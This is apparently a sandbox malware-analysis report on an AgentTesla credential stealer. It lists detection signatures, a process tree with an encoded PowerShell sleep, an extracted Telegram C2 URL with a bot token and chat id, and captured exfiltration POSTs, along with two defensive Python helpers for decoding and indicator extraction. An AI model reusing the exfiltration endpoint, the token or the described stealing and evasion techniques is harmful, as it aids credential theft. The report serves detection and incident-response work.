
Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 830902
MD5: 2ddec3a033a6ded2ec135bb2f3ec897d
SHA1: cb40f86b808c7b7812fff7820dc596d3a78e5760
SHA256: bb4297e1d60fbf0c9670f3a436d3c00993307ccf5bbf9bade4a6ebcb608edd6c
Tags: NET, exe, MSIL

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Creates multiple autostart registry keys
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Encrypted powershell cmdline option found
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • file.exe (PID: 5124 cmdline: C:\Users\user\Desktop\file.exe MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
    • powershell.exe (PID: 4584 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • file.exe (PID: 3508 cmdline: C:\Users\user\Desktop\file.exe MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
    • file.exe (PID: 6116 cmdline: C:\Users\user\Desktop\file.exe MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
  • Qasvjoldkyh.exe (PID: 4840 cmdline: "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe" MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
    • powershell.exe (PID: 4904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Qasvjoldkyh.exe (PID: 388 cmdline: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
  • kDPmkTm.exe (PID: 964 cmdline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe" MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
    • powershell.exe (PID: 5604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • kDPmkTm.exe (PID: 1496 cmdline: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
  • Qasvjoldkyh.exe (PID: 4608 cmdline: "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe" MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
  • kDPmkTm.exe (PID: 3584 cmdline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe" MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
  • cleanup
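Every copy of the binary in the tree above (file.exe and the two persistence copies under AppData\Roaming) spawns powershell.exe with an -ENC argument, which the signature list reports as "Encrypted powershell cmdline option found". The argument is encoded, not encrypted: -EncodedCommand takes the base64 of the script's UTF-16LE bytes, and decoding this one yields start-sleep -seconds 20, a 20-second delay rather than a second stage. The helper below is an added example and not part of the Joe Sandbox report; it decodes the -ENC argument from command lines in the form shown in the process tree (the three sample command lines are copied from it) and flags scripts that consist of nothing but a sleep, so an analyst can tell a stalling trick from a real payload without pasting tokens into a decoder by hand.

```python
import base64
import binascii
import re
from typing import List, Optional, Tuple

# Command lines copied from the process tree above (constructed input for this example).
PROCESS_TREE_CMDLINES = [
    r"C:\Users\user\Desktop\file.exe",
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==',
    r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
]

# A flag token (-x or /x) followed by a base64-looking argument.
_FLAG_WITH_ARG = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]{4,})")


def _is_encoded_command_flag(flag: str) -> bool:
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)."""
    flag = flag.lower()
    return flag.startswith("e") and "encodedcommand".startswith(flag)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand, or None if the command line carries none.

    PowerShell base64-encodes the UTF-16LE bytes of the script, so the payload must be
    decoded as utf-16-le; decoding it as UTF-8 gives NUL-interleaved text instead.
    """
    for match in _FLAG_WITH_ARG.finditer(cmdline):
        flag, payload = match.groups()
        if not _is_encoded_command_flag(flag):
            continue
        try:
            raw = base64.b64decode(payload, validate=True)
        except (binascii.Error, ValueError):
            return None
        if len(raw) % 2:  # UTF-16 needs an even byte count
            return None
        try:
            return raw.decode("utf-16-le")
        except UnicodeDecodeError:
            return None
    return None


# A script that only sleeps is a delay (sandbox evasion), not a second stage.
_PURE_DELAY = re.compile(
    r"^\s*(?:start-sleep|sleep)\s+(?:-s(?:econds)?\s+)?\d+\s*;?\s*$", re.IGNORECASE
)


def is_pure_delay(script: str) -> bool:
    return bool(_PURE_DELAY.match(script))


def decode_process_tree(cmdlines: List[str]) -> List[Tuple[str, str, bool]]:
    """(command line, decoded script, is_pure_delay) for every encoded PowerShell launch."""
    results = []
    for cmdline in cmdlines:
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            results.append((cmdline, decoded, is_pure_delay(decoded)))
    return results


if __name__ == "__main__":
    for cmdline, script, delay_only in decode_process_tree(PROCESS_TREE_CMDLINES):
        print(f"{cmdline}\n  -> {script!r}  (pure delay: {delay_only})")
```

Run against the three command lines above, only the powershell.exe launch decodes, to start-sleep -seconds 20, and it is classified as a pure delay. The prefix check matters in practice: -e, -ec and -enc are all accepted by powershell.exe, while -ex is the start of -ExecutionPolicy and must not be decoded.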
{"C2 url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage?chat_id=6169364705"}
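The extracted configuration above and the sendDocument POSTs in the network section share a single Telegram bot token (the path segment after /bot) and a single chat_id. The token is an attacker-controlled credential: it is what identifies the bot in an abuse report to Telegram, and it is also what any request to api.telegram.org from a defender's network would hand to the operator, so pull it out once and handle it like a password. The helper below is an added example and not part of the Joe Sandbox report; it parses Bot API URLs and bare request paths of the form captured here (the inputs are copied from this report) and returns the deduplicated token, chat id and API methods, with a redaction routine for sharing the indicator.

```python
import json
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Configuration extractor output and request lines copied from this report
# (constructed input for the example).
CONFIG_LINES = [
    '{"C2 url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage"}',
    '{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage?chat_id=6169364705"}',
]
REQUEST_LINES = [
    "POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1",
    "GET / HTTP/1.1",  # the api.ipify.org IP check; carries no bot token
]

# Bot API path layout: /bot<numeric bot id>:<secret>/<method>
_BOT_PATH = re.compile(r"/bot(\d+):([A-Za-z0-9_-]{20,})/([A-Za-z]+)")


def parse_telegram_endpoint(url_or_path: str) -> Optional[Dict[str, Optional[str]]]:
    """Split a Bot API URL (or bare request path) into bot id, full token, method and chat_id."""
    parts = urlsplit(url_or_path)
    match = _BOT_PATH.search(parts.path)
    if not match:
        return None
    bot_id, secret, method = match.groups()
    chat_ids = parse_qs(parts.query).get("chat_id", [])
    return {
        "bot_id": bot_id,
        "token": f"{bot_id}:{secret}",
        "method": method,
        "chat_id": chat_ids[0] if chat_ids else None,
    }


def collect_telegram_iocs(config_lines: List[str], request_lines: List[str]) -> Dict[str, List[str]]:
    """Merge extractor output and captured request lines into one deduplicated IOC set."""
    candidates: List[str] = []
    for line in config_lines:
        for value in json.loads(line).values():
            if isinstance(value, str) and "api.telegram.org" in value:
                candidates.append(value)
    for line in request_lines:
        # Request line is "<METHOD> <path> HTTP/x.y"; only the path can carry the token.
        _, path, _ = line.split(" ", 2)
        candidates.append(path)

    tokens, chat_ids, methods = set(), set(), set()
    for candidate in candidates:
        endpoint = parse_telegram_endpoint(candidate)
        if endpoint is None:
            continue
        tokens.add(endpoint["token"])
        methods.add(endpoint["method"])
        if endpoint["chat_id"]:
            chat_ids.add(endpoint["chat_id"])
    return {"tokens": sorted(tokens), "chat_ids": sorted(chat_ids), "methods": sorted(methods)}


def redact_token(token: str) -> str:
    """Keep the public bot id and the first 4 secret characters; mask the rest for sharing."""
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{secret[:4]}{'*' * (len(secret) - 4)}"


if __name__ == "__main__":
    iocs = collect_telegram_iocs(CONFIG_LINES, REQUEST_LINES)
    for token in iocs["tokens"]:
        print("bot token :", redact_token(token))
    print("chat ids  :", iocs["chat_ids"])
    print("methods   :", iocs["methods"])
```

On this report's data the result is one token, one chat id (6169364705) and two methods, sendMessage from the configuration and sendDocument from the live traffic. Note the asymmetry in that traffic: the api.ipify.org GET carries a spoofed Firefox User-Agent, while the Telegram POSTs carry none, consistent with the "HTTP GET or POST without a user agent" signature listed above.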
Yara matches (memory dumps):
Source | Rule | Description | Author
00000013.00000002.616219501.00000000034BC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000004.00000002.618527573.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
Process Memory Space: file.exe PID: 6116 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
Process Memory Space: file.exe PID: 6116 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security

Yara matches (unpacked PEs):
Source | Rule | Description | Author
0.2.file.exe.5710000.4.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
0.3.file.exe.41b5d50.2.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
                No Sigma rule has matched
Snort IDS alerts:
Timestamp: 03/20/23-19:39:50.282462
Source: 192.168.2.4
Destination: 149.154.167.220
Source Port: 49702
Destination Port: 443
Protocol: TCP
SID: 2851779
Classtype: A Network Trojan was detected

Timestamp: 03/20/23-19:38:26.620974
Source: 192.168.2.4
Destination: 149.154.167.220
Source Port: 49698
Destination Port: 443
Protocol: TCP
SID: 2851779
Classtype: A Network Trojan was detected

                AV Detection

Source: file.exe | ReversingLabs: Detection: 35%
Source: file.exe | Virustotal: Detection: 44%
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Virustotal: Detection: 44%
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | ReversingLabs: Detection: 35%
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Joe Sandbox ML: detected
Source: 15.2.Qasvjoldkyh.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage?chat_id=6169364705"}
Source: file.exe.6116.4.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage"}
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.4:49697 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49698 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.4:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49702 version: TLS 1.2
Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb | found in: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 | found in: the same eight memory dumps as the previous entry

                Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49698 -> 149.154.167.220:443
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49702 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org (2 queries)
Source: C:\Users\user\Desktop\file.exe | DNS query: name: api.ipify.org (6 queries)
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | DNS query: name: api.ipify.org (6 queries)
Source: unknown | DNS query: name: api.ipify.org (6 queries)
Source: Yara match | File source: 0.2.file.exe.5710000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.41b5d50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
    POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8db29b545d5b5a8
    Host: api.telegram.org
    Content-Length: 972
    Expect: 100-continue
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8db298ba02c5c53
    Host: api.telegram.org
    Content-Length: 972
    Expect: 100-continue
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.237.62.211
Source: global traffic | HTTP traffic detected (2 requests):
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
Source: unknown | Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown | Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
                Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
                Source: file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api4.ipify.org
                Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/
                Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCert
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrusted
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                Source: file.exe, 00000004.00000003.396945802.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.566195369.0000000000FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/
                Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCert
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrusted
